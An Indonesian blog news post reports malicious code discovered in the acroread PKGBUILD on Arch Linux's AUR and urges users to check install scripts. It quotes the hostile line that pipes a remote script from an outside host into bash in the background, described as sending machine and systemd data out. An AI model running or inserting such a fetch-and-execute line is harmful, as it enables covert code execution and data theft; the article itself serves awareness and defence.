Berita

Skrip Tak Jelas di AUR Arch Linux Unggah Info Mesin Komputer Pengguna Tanpa Izin

Banyaknya pilihan paket aplikasi di repositori biasa menjadi poin yang dipamerkan oleh seorang pengguna GNU/Linux kepada orang lain. Pengguna Arch Linux salah satunya. Mereka biasa mengunggulkan banyaknya paket aplikasi yang tersedia untuk mereka jika menggunakan Arch Linux, meskipun mereka menyinggung AUR yang sebenarnya adalah repositori pihak ketiga, bukan repositori ofisial.

Saya pernah menggunakan Manjaro. Meskipun secara teknis bukan Arch Linux tetapi saya menyetujui jika AUR adalah representasi dari banyaknya aplikasi yang dapat saya instal darinya. AUR atau Arch User Repository juga merupakan representasi kontributor. Semua skrip PKGBUILD yang tersedia di AUR ditulis oleh pengguna Arch Linux atau pengguna lain yang memanfaatkan AUR.

Karena kebebasan orang untuk berkontribusi di repositori pihak ketiga tersebut, keamanan skrip yang tersedia di sana tidak dapat dijamin seratus persen berkualitas. Pengguna disarankan untuk selalu mengecek skrip PKGBUILD yang akan dipasang sebelum menjalankan perintah instal.

Beberapa jam lalu, terdeteksi skrip tak jelas (malicious) di berkas PKGBUILD acroread di AUR. Skrip tak jelas tersebut dapat dilihat di sini. Lebih tepatnya pada bagian:

curl -s https://ptpb.pw/~x|bash -&

Sebaris skrip yang tidak ada hubungannya dengan instalasi acroread tersebut bermaksud mengirimkan informasi seputar data mesin pengguna dan unit systemd yang dijalankan oleh sistem. Yang menarik, skrip ini sebetulnya tidak berjalan seperti yang diinginkan oleh penulis, seorang redditor sekaligus pengguna Arch Linux menemukan kecacatan tersebut.

AUR skrip

Pelajaran yang dapat diambil

Memeriksa skrip apapun termasuk skrip instalasi paket dari lokasi nonresmi adalah sebuah hal wajib meskipun dianggap membosankan. Skrip tak jelas yang baru saja ditemukan di atas mungkin “masih ringan”, bagaimana jika ada skrip di berkas lain yang menghapus komponen tertentu sistem operasi atau bahkan menghapus data pengguna. Sungguh merepotkan sekali, bukan?

Ramdziana adalah seorang narablog, pecinta kode, penggemar open source, pengguna GNU/Linux, dan penggemar Sherlock Holmes. Ikuti akun Twitter/Sebangsa @ramdziana
slot iklan

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top